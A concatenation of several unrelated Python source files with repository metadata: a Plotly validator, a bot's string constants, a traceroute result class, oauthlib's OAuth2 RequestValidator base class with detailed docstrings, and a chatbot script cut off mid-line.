2020-08-09T02:30:14.000Z
|
2022-03-12T00:50:14.000Z
|
env/lib/python3.8/site-packages/plotly/validators/layout/polar/radialaxis/tickformatstop/_value.py
|
acrucetta/Chicago_COVI_WebApp
|
a37c9f492a20dcd625f8647067394617988de913
|
[
"MIT",
"Unlicense"
] | 11
|
2020-07-12T16:18:07.000Z
|
2022-02-05T16:48:35.000Z
|
import _plotly_utils.basevalidators
class ValueValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(
self,
plotly_name="value",
parent_name="layout.polar.radialaxis.tickformatstop",
**kwargs
):
super(ValueValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "plot"),
role=kwargs.pop("role", "style"),
**kwargs
)
| 28.055556
| 67
| 0.615842
|
23e07c80c98a181a4aad799819c15071fb06f82b
| 1,971
|
py
|
Python
|
pb_string.py
|
raskitoma/crawler_bot
|
5376904f1c92997b7284fbf44fc2e020f275ed61
|
[
"MIT"
] | null | null | null |
pb_string.py
|
raskitoma/crawler_bot
|
5376904f1c92997b7284fbf44fc2e020f275ed61
|
[
"MIT"
] | null | null | null |
pb_string.py
|
raskitoma/crawler_bot
|
5376904f1c92997b7284fbf44fc2e020f275ed61
|
[
"MIT"
] | null | null | null |
#############################################
# Plazabot - pb_string.py
# (c)2021, Doubtfull Productions
#--------------------------------------------
# Common strings
#--------------------------------------------
# TODO
#--------------------------------------------
LOG_ALL = 'ALL'
LOG_ERROR = 'ERROR'
LOG_ALERT = 'ALERT'
LOG_SUCCESS = 'SUCCESS'
LOG_WARNING = 'WARNING'
LOG_CRITICAL = 'CRITICAL'
LOG_EVENT = 'EVENT'
LOG_SORT_ASC = 'asc'
LOG_SORT_DES = 'desc'
MODULE_EVENT = 'EVENT'
MODULE_BROWSER = 'BROWSER'
MODULE_COMMS = 'COMMS'
MODULE_NOTIFIER = 'NOTIFIER'
MODULE_DB = 'DB'
MODULE_MAILER = 'MAILER'
MODULE_SELENIUM = 'SELENIUM'
MODULE_CRAWLER = 'CRAWLER'
# Other strings...
HELPER_URI = 'Project URI.'
HELPER_NAME = 'Optional Project Name. If not provided will generate one \
based on Filename/URI.'
HELPER_UPLD = 'Optional ZIP project file.'
HELPER_KYWD = 'Optional Keyword to filter search results. Empty \
will retrieve all available values.'
HELPER_AUTO_CLONE = 'This allows the Project to be automatically \
downloaded/grabbed on creation'
HELPER_AUTO_SCAN = 'This allows the Project to be scanned automatically \
on creation'
DEF_ERRR = 'Error: {}.'
DEF_CLOK = 'Project Grabbed/Downloaded!'
DEF_CLER = 'Error downloading: {} - {}.'
DEF_PKER = 'Project Key required!'
DEF_PJMI = 'Project {} does not exists!'
ERR_PROJ_N = 'Project file not provided, Project URI must be set!'
RESP_NEW_PROJECT = '"Result": "{} processed successfully", "DB_Status": {}, "File_Status": "{}", "Method": "{}"'
URI_NOT_PRJ = 'Error, Project not found, check URI'
URI_OK = 'Project Downloaded Successfully'
URI_SKIP = 'Project not downloaded by user request!'
ZIP_OK = 'Zip copied and expanded successfully!'
API_AUTH_ERROR = 'Error! Not authorized!'
HELPER_UNAM = 'URI username'
HELPER_PASS = 'URI password'
HELPER_TOKE = 'URI personal access token'
HELPER_BRANCH = 'URI branch'
UPD_OK = 'Project updated'
#############################################
# EoF
| 33.982759
| 112
| 0.647387
|
5d1c315bcaf7205ccaecbb592f650b466f7318a8
| 3,057
|
py
|
Python
|
utils/traceroute_struct.py
|
wikicensorship/tracevis
|
63bc2df04c02b6eb489aaaa3e31c8f07ec40e57e
|
[
"Unlicense"
] | 78
|
2021-11-27T11:59:53.000Z
|
2022-03-29T10:00:39.000Z
|
utils/traceroute_struct.py
|
wikicensorship/tracevis
|
63bc2df04c02b6eb489aaaa3e31c8f07ec40e57e
|
[
"Unlicense"
] | 18
|
2021-11-28T00:48:48.000Z
|
2022-03-23T23:03:39.000Z
|
utils/traceroute_struct.py
|
wikicensorship/tracevis
|
63bc2df04c02b6eb489aaaa3e31c8f07ec40e57e
|
[
"Unlicense"
] | 12
|
2021-11-26T19:36:43.000Z
|
2021-12-21T20:23:38.000Z
|
#!/usr/bin/env python3
import json
import utils.convert_packetlist
class traceroute_data:
def __init__(
self, dst_addr: str, annotation: str, proto: str, port: int, timestamp: int,
src_addr: str = "127.0.0.2", from_ip: str = "127.0.0.1",
prb_id: int = -1, msm_id: int = -1, msm_name: str = "traceroute",
ttr: float = -1, af: int = 4, lts: int = -1, paris_id: int = -1,
size: int = -1, dst_name: str = "",
network_asn: str = "", network_name: str = "", country_code: str = "",
city: str = ''
) -> None:
self.af = af
self.dst_addr = dst_addr
self.dst_name = dst_name
self.annotation = annotation
self.endtime = -1
self.from_ip = from_ip
self.lts = lts
self.msm_id = msm_id
self.msm_name = msm_name
self.paris_id = paris_id
self.prb_id = prb_id
self.proto = proto
self.port = port
self.result = []
self.size = size
self.src_addr = src_addr
self.timestamp = timestamp
self.ttr = ttr
self.asn = network_asn
self.asname = network_name
self.cc = country_code
self.city = city
def add_hop(self, hop, from_ip, rtt, size, ttl, answer_summary, answered, unanswered):
if len(self.result) < hop:
(self.result).append({"hop": hop, "result": []})
if rtt == 0:
self.result[hop - 1]["result"].append({
"x": "-",
})
elif from_ip == "***":
packetlist = utils.convert_packetlist.packetlist2json(
answered, unanswered, self.from_ip)
self.result[hop - 1]["result"].append({
"x": "*",
"packets": packetlist,
})
else:
packetlist = utils.convert_packetlist.packetlist2json(
answered, unanswered, self.from_ip)
self.result[hop - 1]["result"].append({
"from": from_ip,
"rtt": rtt,
"size": size,
"ttl": ttl,
"summary": answer_summary,
"packets": packetlist,
})
def set_endtime(self, endtime):
self.endtime = endtime
if self.src_addr == self.from_ip:
self.src_addr = '127.1.2.7'
if self.from_ip != '127.1.2.7':
self.from_ip = '127.1.2.7'
def clean_extra_result(self):
result_index = 0
for try_step in self.result: # will be up to 255
results = try_step["result"]
repeat_steps = 0
for result in results: # will be unknown
if "x" in result.keys():
if '-' == result["x"]:
repeat_steps += 1
if repeat_steps == len(results):
del self.result[result_index:]
break
result_index += 1
def json(self):
return json.dumps(self, default=lambda o: o.__dict__,
indent=4)
| 33.966667
| 90
| 0.508669
|
03225d11262b9167086fea3076a17ef00906963b
| 36,519
|
py
|
Python
|
lib/oauthlib/oauth2/rfc6749/request_validator.py
|
splunkenizer/splunk_as_a_service_app
|
97c4aaf927d2171bf131126cf9b70489ac75bc5a
|
[
"Apache-2.0"
] | 7
|
2019-12-21T00:14:14.000Z
|
2021-03-11T14:51:37.000Z
|
lib/oauthlib/oauth2/rfc6749/request_validator.py
|
splunkenizer/splunk_as_a_service_app
|
97c4aaf927d2171bf131126cf9b70489ac75bc5a
|
[
"Apache-2.0"
] | 29
|
2019-10-09T11:16:21.000Z
|
2020-06-23T09:32:09.000Z
|
lib/oauthlib/oauth2/rfc6749/request_validator.py
|
splunkenizer/splunk_as_a_service_app
|
97c4aaf927d2171bf131126cf9b70489ac75bc5a
|
[
"Apache-2.0"
] | 1
|
2021-05-07T10:13:31.000Z
|
2021-05-07T10:13:31.000Z
|
# -*- coding: utf-8 -*-
"""
oauthlib.oauth2.rfc6749.request_validator
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
from __future__ import absolute_import, unicode_literals
import logging
log = logging.getLogger(__name__)
class RequestValidator(object):
def client_authentication_required(self, request, *args, **kwargs):
"""Determine if client authentication is required for current request.
According to the rfc6749, client authentication is required in the following cases:
- Resource Owner Password Credentials Grant, when Client type is Confidential or when
Client was issued client credentials or whenever Client provided client
authentication, see `Section 4.3.2`_.
- Authorization Code Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication,
see `Section 4.1.3`_.
- Refresh Token Grant, when Client type is Confidential or when Client was issued
client credentials or whenever Client provided client authentication, see
`Section 6`_
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Resource Owner Password Credentials Grant
- Refresh Token Grant
.. _`Section 4.3.2`: https://tools.ietf.org/html/rfc6749#section-4.3.2
.. _`Section 4.1.3`: https://tools.ietf.org/html/rfc6749#section-4.1.3
.. _`Section 6`: https://tools.ietf.org/html/rfc6749#section-6
"""
return True
def authenticate_client(self, request, *args, **kwargs):
"""Authenticate client through means outside the OAuth 2 spec.
Means of authentication is negotiated beforehand and may for example
be `HTTP Basic Authentication Scheme`_ which utilizes the Authorization
header.
Headers may be accesses through request.headers and parameters found in
both body and query can be obtained by direct attribute access, i.e.
request.client_id for client_id in the URL query.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Resource Owner Password Credentials Grant (may be disabled)
- Client Credentials Grant
- Refresh Token Grant
.. _`HTTP Basic Authentication Scheme`: https://tools.ietf.org/html/rfc1945#section-11.1
"""
raise NotImplementedError('Subclasses must implement this method.')
def authenticate_client_id(self, client_id, request, *args, **kwargs):
"""Ensure client_id belong to a non-confidential client.
A non-confidential client is one that is not required to authenticate
through other means, such as using HTTP Basic.
Note, while not strictly necessary it can often be very convenient
to set request.client to the client object associated with the
given client_id.
:param client_id: Unicode client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def confirm_redirect_uri(self, client_id, code, redirect_uri, client, request,
*args, **kwargs):
"""Ensure that the authorization process represented by this authorization
code began with this 'redirect_uri'.
If the client specifies a redirect_uri when obtaining code then that
redirect URI must be bound to the code and verified equal in this
method, according to RFC 6749 section 4.1.3. Do not compare against
the client's allowed redirect URIs, but against the URI used when the
code was saved.
:param client_id: Unicode client identifier.
:param code: Unicode authorization_code.
:param redirect_uri: Unicode absolute URI.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant (during token request)
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_default_redirect_uri(self, client_id, request, *args, **kwargs):
"""Get the default redirect URI for the client.
:param client_id: Unicode client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: The default redirect URI for the client
Method is used by:
- Authorization Code Grant
- Implicit Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_default_scopes(self, client_id, request, *args, **kwargs):
"""Get the default scopes for the client.
:param client_id: Unicode client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: List of default scopes
Method is used by all core grant types:
- Authorization Code Grant
- Implicit Grant
- Resource Owner Password Credentials Grant
- Client Credentials grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_original_scopes(self, refresh_token, request, *args, **kwargs):
"""Get the list of scopes associated with the refresh token.
:param refresh_token: Unicode refresh token.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: List of scopes.
Method is used by:
- Refresh token grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def is_within_original_scope(self, request_scopes, refresh_token, request, *args, **kwargs):
"""Check if requested scopes are within a scope of the refresh token.
When access tokens are refreshed the scope of the new token
needs to be within the scope of the original token. This is
ensured by checking that all requested scopes strings are on
the list returned by the get_original_scopes. If this check
fails, is_within_original_scope is called. The method can be
used in situations where returning all valid scopes from the
get_original_scopes is not practical.
:param request_scopes: A list of scopes that were requested by client.
:param refresh_token: Unicode refresh_token.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Refresh token grant
"""
return False
def introspect_token(self, token, token_type_hint, request, *args, **kwargs):
"""Introspect an access or refresh token.
Called once the introspect request is validated. This method should
verify the *token* and either return a dictionary with the list of
claims associated, or `None` in case the token is unknown.
Below the list of registered claims you should be interested in:
- scope : space-separated list of scopes
- client_id : client identifier
- username : human-readable identifier for the resource owner
- token_type : type of the token
- exp : integer timestamp indicating when this token will expire
- iat : integer timestamp indicating when this token was issued
- nbf : integer timestamp indicating when it can be "not-before" used
- sub : subject of the token - identifier of the resource owner
- aud : list of string identifiers representing the intended audience
- iss : string representing issuer of this token
- jti : string identifier for the token
Note that most of them are coming directly from JWT RFC. More details
can be found in `Introspect Claims`_ or `_JWT Claims`_.
The implementation can use *token_type_hint* to improve lookup
efficency, but must fallback to other types to be compliant with RFC.
The dict of claims is added to request.token after this method.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
Method is used by:
- Introspect Endpoint (all grants are compatible)
.. _`Introspect Claims`: https://tools.ietf.org/html/rfc7662#section-2.2
.. _`JWT Claims`: https://tools.ietf.org/html/rfc7519#section-4
"""
raise NotImplementedError('Subclasses must implement this method.')
def invalidate_authorization_code(self, client_id, code, request, *args, **kwargs):
"""Invalidate an authorization code after use.
:param client_id: Unicode client identifier.
:param code: The authorization code grant (request.code).
:param request: OAuthlib request.
:type request: oauthlib.common.Request
Method is used by:
- Authorization Code Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def revoke_token(self, token, token_type_hint, request, *args, **kwargs):
"""Revoke an access or refresh token.
:param token: The token string.
:param token_type_hint: access_token or refresh_token.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
Method is used by:
- Revocation Endpoint
"""
raise NotImplementedError('Subclasses must implement this method.')
def rotate_refresh_token(self, request):
"""Determine whether to rotate the refresh token. Default, yes.
When access tokens are refreshed the old refresh token can be kept
or replaced with a new one (rotated). Return True to rotate and
and False for keeping original.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Refresh Token Grant
"""
return True
def save_authorization_code(self, client_id, code, request, *args, **kwargs):
"""Persist the authorization_code.
The code should at minimum be stored with:
- the client_id (``client_id``)
- the redirect URI used (``request.redirect_uri``)
- a resource owner / user (``request.user``)
- the authorized scopes (``request.scopes``)
- the client state, if given (``code.get('state')``)
To support PKCE, you MUST associate the code with:
- Code Challenge (``request.code_challenge``) and
- Code Challenge Method (``request.code_challenge_method``)
The ``code`` argument is actually a dictionary, containing at least a
``code`` key with the actual authorization code:
``{'code': 'sdf345jsdf0934f'}``
It may also have a ``state`` key containing a nonce for the client, if it
chose to send one. That value should be saved and used in
``.validate_code``.
It may also have a ``claims`` parameter which, when present, will be a dict
deserialized from JSON as described at
http://openid.net/specs/openid-connect-core-1_0.html#ClaimsParameter
This value should be saved in this method and used again in ``.validate_code``.
:param client_id: Unicode client identifier.
:param code: A dict of the authorization code grant and, optionally, state.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
Method is used by:
- Authorization Code Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_authorization_code_scopes(self, client_id, code, redirect_uri, request):
""" Extracts scopes from saved authorization code.
The scopes returned by this method is used to route token requests
based on scopes passed to Authorization Code requests.
With that the token endpoint knows when to include OpenIDConnect
id_token in token response only based on authorization code scopes.
Only code param should be sufficient to retrieve grant code from
any storage you are using, `client_id` and `redirect_uri` can gave a
blank value `""` don't forget to check it before using those values
in a select query if a database is used.
:param client_id: Unicode client identifier.
:param code: Unicode authorization code grant.
:param redirect_uri: Unicode absolute URI.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:return: A list of scopes
Method is used by:
- Authorization Token Grant Dispatcher
"""
raise NotImplementedError('Subclasses must implement this method.')
def save_token(self, token, request, *args, **kwargs):
"""Persist the token with a token type specific method.
Currently, only save_bearer_token is supported.
:param token: A (Bearer) token dict.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
"""
return self.save_bearer_token(token, request, *args, **kwargs)
def save_bearer_token(self, token, request, *args, **kwargs):
"""Persist the Bearer token.
The Bearer token should at minimum be associated with:
- a client and it's client_id, if available
- a resource owner / user (request.user)
- authorized scopes (request.scopes)
- an expiration time
- a refresh token, if issued
- a claims document, if present in request.claims
The Bearer token dict may hold a number of items::
{
'token_type': 'Bearer',
'access_token': 'askfjh234as9sd8',
'expires_in': 3600,
'scope': 'string of space separated authorized scopes',
'refresh_token': '23sdf876234', # if issued
'state': 'given_by_client', # if supplied by client
}
Note that while "scope" is a string-separated list of authorized scopes,
the original list is still available in request.scopes.
The token dict is passed as a reference so any changes made to the dictionary
will go back to the user. If additional information must return to the client
user, and it is only possible to get this information after writing the token
to storage, it should be added to the token dictionary. If the token
dictionary must be modified but the changes should not go back to the user,
a copy of the dictionary must be made before making the changes.
Also note that if an Authorization Code grant request included a valid claims
parameter (for OpenID Connect) then the request.claims property will contain
the claims dict, which should be saved for later use when generating the
id_token and/or UserInfo response content.
:param token: A Bearer token dict.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: The default redirect URI for the client
Method is used by all core grant types issuing Bearer tokens:
- Authorization Code Grant
- Implicit Grant
- Resource Owner Password Credentials Grant (might not associate a client)
- Client Credentials grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_jwt_bearer_token(self, token, token_handler, request):
"""Get JWT Bearer token or OpenID Connect ID token
If using OpenID Connect this SHOULD call `oauthlib.oauth2.RequestValidator.get_id_token`
:param token: A Bearer token dict.
:param token_handler: The token handler (BearerToken class).
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:return: The JWT Bearer token or OpenID Connect ID token (a JWS signed JWT)
Method is used by JWT Bearer and OpenID Connect tokens:
- JWTToken.create_token
"""
raise NotImplementedError('Subclasses must implement this method.')
def get_id_token(self, token, token_handler, request):
"""Get OpenID Connect ID token
In the OpenID Connect workflows when an ID Token is requested this method is called.
Subclasses should implement the construction, signing and optional encryption of the
ID Token as described in the OpenID Connect spec.
In addition to the standard OAuth2 request properties, the request may also contain
these OIDC specific properties which are useful to this method:
- nonce, if workflow is implicit or hybrid and it was provided
- claims, if provided to the original Authorization Code request
The token parameter is a dict which may contain an ``access_token`` entry, in which
case the resulting ID Token *should* include a calculated ``at_hash`` claim.
Similarly, when the request parameter has a ``code`` property defined, the ID Token
*should* include a calculated ``c_hash`` claim.
http://openid.net/specs/openid-connect-core-1_0.html (sections `3.1.3.6`_, `3.2.2.10`_, `3.3.2.11`_)
.. _`3.1.3.6`: http://openid.net/specs/openid-connect-core-1_0.html#CodeIDToken
.. _`3.2.2.10`: http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDToken
.. _`3.3.2.11`: http://openid.net/specs/openid-connect-core-1_0.html#HybridIDToken
:param token: A Bearer token dict.
:param token_handler: The token handler (BearerToken class)
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:return: The ID Token (a JWS signed JWT)
"""
# the request.scope should be used by the get_id_token() method to determine which claims to include in the resulting id_token
raise NotImplementedError('Subclasses must implement this method.')
def validate_jwt_bearer_token(self, token, scopes, request):
"""Ensure the JWT Bearer token or OpenID Connect ID token are valids and authorized access to scopes.
If using OpenID Connect this SHOULD call `oauthlib.oauth2.RequestValidator.get_id_token`
If not using OpenID Connect this can `return None` to avoid 5xx rather 401/3 response.
OpenID connect core 1.0 describe how to validate an id_token:
- http://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation
- http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDTValidation
- http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation
- http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation2
:param token: Unicode Bearer token.
:param scopes: List of scopes (defined by you).
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is indirectly used by all core OpenID connect JWT token issuing grant types:
- Authorization Code Grant
- Implicit Grant
- Hybrid Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_id_token(self, token, scopes, request):
"""Ensure the id token is valid and authorized access to scopes.
OpenID connect core 1.0 describe how to validate an id_token:
- http://openid.net/specs/openid-connect-core-1_0.html#IDTokenValidation
- http://openid.net/specs/openid-connect-core-1_0.html#ImplicitIDTValidation
- http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation
- http://openid.net/specs/openid-connect-core-1_0.html#HybridIDTValidation2
:param token: Unicode Bearer token.
:param scopes: List of scopes (defined by you).
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is indirectly used by all core OpenID connect JWT token issuing grant types:
- Authorization Code Grant
- Implicit Grant
- Hybrid Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_bearer_token(self, token, scopes, request):
"""Ensure the Bearer token is valid and authorized access to scopes.
:param token: A string of random characters.
:param scopes: A list of scopes associated with the protected resource.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
A key to OAuth 2 security and restricting impact of leaked tokens is
the short expiration time of tokens, *always ensure the token has not
expired!*.
Two different approaches to scope validation:
1) all(scopes). The token must be authorized access to all scopes
associated with the resource. For example, the
token has access to ``read-only`` and ``images``,
thus the client can view images but not upload new.
Allows for fine grained access control through
combining various scopes.
2) any(scopes). The token must be authorized access to one of the
scopes associated with the resource. For example,
token has access to ``read-only-images``.
Allows for fine grained, although arguably less
convenient, access control.
A powerful way to use scopes would mimic UNIX ACLs and see a scope
as a group with certain privileges. For a restful API these might
map to HTTP verbs instead of read, write and execute.
Note, the request.user attribute can be set to the resource owner
associated with this token. Similarly the request.client and
request.scopes attribute can be set to associated client object
and authorized scopes. If you then use a decorator such as the
one provided for django these attributes will be made available
in all protected views as keyword arguments.
:param token: Unicode Bearer token
:param scopes: List of scopes (defined by you)
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is indirectly used by all core Bearer token issuing grant types:
- Authorization Code Grant
- Implicit Grant
- Resource Owner Password Credentials Grant
- Client Credentials Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_client_id(self, client_id, request, *args, **kwargs):
"""Ensure client_id belong to a valid and active client.
Note, while not strictly necessary it can often be very convenient
to set request.client to the client object associated with the
given client_id.
:param client_id: Unicode client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Implicit Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_code(self, client_id, code, client, request, *args, **kwargs):
"""Verify that the authorization_code is valid and assigned to the given
client.
Before returning true, set the following based on the information stored
with the code in 'save_authorization_code':
- request.user
- request.state (if given)
- request.scopes
- request.claims (if given)
OBS! The request.user attribute should be set to the resource owner
associated with this authorization code. Similarly request.scopes
must also be set.
The request.claims property, if it was given, should assigned a dict.
If PKCE is enabled (see 'is_pkce_required' and 'save_authorization_code')
you MUST set the following based on the information stored:
- request.code_challenge
- request.code_challenge_method
:param client_id: Unicode client identifier.
:param code: Unicode authorization code.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_grant_type(self, client_id, grant_type, client, request, *args, **kwargs):
"""Ensure client is authorized to use the grant_type requested.
:param client_id: Unicode client identifier.
:param grant_type: Unicode grant type, i.e. authorization_code, password.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Resource Owner Password Credentials Grant
- Client Credentials Grant
- Refresh Token Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_redirect_uri(self, client_id, redirect_uri, request, *args, **kwargs):
"""Ensure client is authorized to redirect to the redirect_uri requested.
All clients should register the absolute URIs of all URIs they intend
to redirect to. The registration is outside of the scope of oauthlib.
:param client_id: Unicode client identifier.
:param redirect_uri: Unicode absolute URI.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Implicit Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_refresh_token(self, refresh_token, client, request, *args, **kwargs):
"""Ensure the Bearer token is valid and authorized access to scopes.
OBS! The request.user attribute should be set to the resource owner
associated with this refresh token.
:param refresh_token: Unicode refresh token.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant (indirectly by issuing refresh tokens)
- Resource Owner Password Credentials Grant (also indirectly)
- Refresh Token Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_response_type(self, client_id, response_type, client, request, *args, **kwargs):
"""Ensure client is authorized to use the response_type requested.
:param client_id: Unicode client identifier.
:param response_type: Unicode response type, i.e. code, token.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
- Implicit Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_scopes(self, client_id, scopes, client, request, *args, **kwargs):
"""Ensure the client is authorized access to requested scopes.
:param client_id: Unicode client identifier.
:param scopes: List of scopes (defined by you).
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by all core grant types:
- Authorization Code Grant
- Implicit Grant
- Resource Owner Password Credentials Grant
- Client Credentials Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_silent_authorization(self, request):
"""Ensure the logged in user has authorized silent OpenID authorization.
Silent OpenID authorization allows access tokens and id tokens to be
granted to clients without any user prompt or interaction.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- OpenIDConnectAuthCode
- OpenIDConnectImplicit
- OpenIDConnectHybrid
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_silent_login(self, request):
"""Ensure session user has authorized silent OpenID login.
If no user is logged in or has not authorized silent login, this
method should return False.
If the user is logged in but associated with multiple accounts and
not selected which one to link to the token then this method should
raise an oauthlib.oauth2.AccountSelectionRequired error.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- OpenIDConnectAuthCode
- OpenIDConnectImplicit
- OpenIDConnectHybrid
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_user(self, username, password, client, request, *args, **kwargs):
"""Ensure the username and password is valid.
OBS! The validation should also set the user attribute of the request
to a valid resource owner, i.e. request.user = username or similar. If
not set you will be unable to associate a token with a user in the
persistance method used (commonly, save_bearer_token).
:param username: Unicode username.
:param password: Unicode password.
:param client: Client object set by you, see ``.authenticate_client``.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Resource Owner Password Credentials Grant
"""
raise NotImplementedError('Subclasses must implement this method.')
def validate_user_match(self, id_token_hint, scopes, claims, request):
"""Ensure client supplied user id hint matches session user.
If the sub claim or id_token_hint is supplied then the session
user must match the given ID.
:param id_token_hint: User identifier string.
:param scopes: List of OAuth 2 scopes and OpenID claims (strings).
:param claims: OpenID Connect claims dict.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- OpenIDConnectAuthCode
- OpenIDConnectImplicit
- OpenIDConnectHybrid
"""
raise NotImplementedError('Subclasses must implement this method.')
def is_pkce_required(self, client_id, request):
"""Determine if current request requires PKCE. Default, False.
This is called for both "authorization" and "token" requests.
Override this method by ``return True`` to enable PKCE for everyone.
You might want to enable it only for public clients.
Note that PKCE can also be used in addition of a client authentication.
OAuth 2.0 public clients utilizing the Authorization Code Grant are
susceptible to the authorization code interception attack. This
specification describes the attack as well as a technique to mitigate
against the threat through the use of Proof Key for Code Exchange
(PKCE, pronounced "pixy"). See `RFC7636`_.
:param client_id: Client identifier.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: True or False
Method is used by:
- Authorization Code Grant
.. _`RFC7636`: https://tools.ietf.org/html/rfc7636
"""
return False
def get_code_challenge(self, code, request):
"""Is called for every "token" requests.
When the server issues the authorization code in the authorization
response, it MUST associate the ``code_challenge`` and
``code_challenge_method`` values with the authorization code so it can
be verified later.
Typically, the ``code_challenge`` and ``code_challenge_method`` values
are stored in encrypted form in the ``code`` itself but could
alternatively be stored on the server associated with the code. The
server MUST NOT include the ``code_challenge`` value in client requests
in a form that other entities can extract.
Return the ``code_challenge`` associated to the code.
If ``None`` is returned, code is considered to not be associated to any
challenges.
:param code: Authorization code.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: code_challenge string
Method is used by:
- Authorization Code Grant - when PKCE is active
"""
return None
def get_code_challenge_method(self, code, request):
"""Is called during the "token" request processing, when a
``code_verifier`` and a ``code_challenge`` has been provided.
See ``.get_code_challenge``.
Must return ``plain`` or ``S256``. You can return a custom value if you have
implemented your own ``AuthorizationCodeGrant`` class.
:param code: Authorization code.
:param request: OAuthlib request.
:type request: oauthlib.common.Request
:rtype: code_challenge_method string
Method is used by:
- Authorization Code Grant - when PKCE is active
"""
raise NotImplementedError('Subclasses must implement this method.')
| 44.05187
| 135
| 0.645281
|
0bb07bb1877afbdee2fbdf56c131b28bd34e27e8
| 1,007
|
py
|
Python
|
main.py
|
sycomix/aio-bot
|
7efe30e392985913a4f6fb3913b285abc68ea694
|
[
"CC0-1.0"
] | 18
|
2019-10-08T10:15:27.000Z
|
2022-02-21T06:36:57.000Z
|
main.py
|
sycomix/aio-bot
|
7efe30e392985913a4f6fb3913b285abc68ea694
|
[
"CC0-1.0"
] | 3
|
2020-04-17T20:43:58.000Z
|
2022-02-10T00:21:01.000Z
|
main.py
|
sycomix/aio-bot
|
7efe30e392985913a4f6fb3913b285abc68ea694
|
[
"CC0-1.0"
] | 8
|
2020-03-07T10:17:11.000Z
|
2021-07-05T05:22:04.000Z
|
from utils import *
def chat():
nam = "Unknown"
# call = multiFunctionCall({"whoIs":whoIs,"emo":emo, "identifyu":identifyu, "whathappen":whathappen, "learnq":learnq, "learna":learna})
firstQuestion="Hi, I am chatbot."
template = "Unknown.template"
#print(template)
decryp(template)
Chat(template).converse(firstQuestion)
from os import path
if path.exists(nam+".txt"):
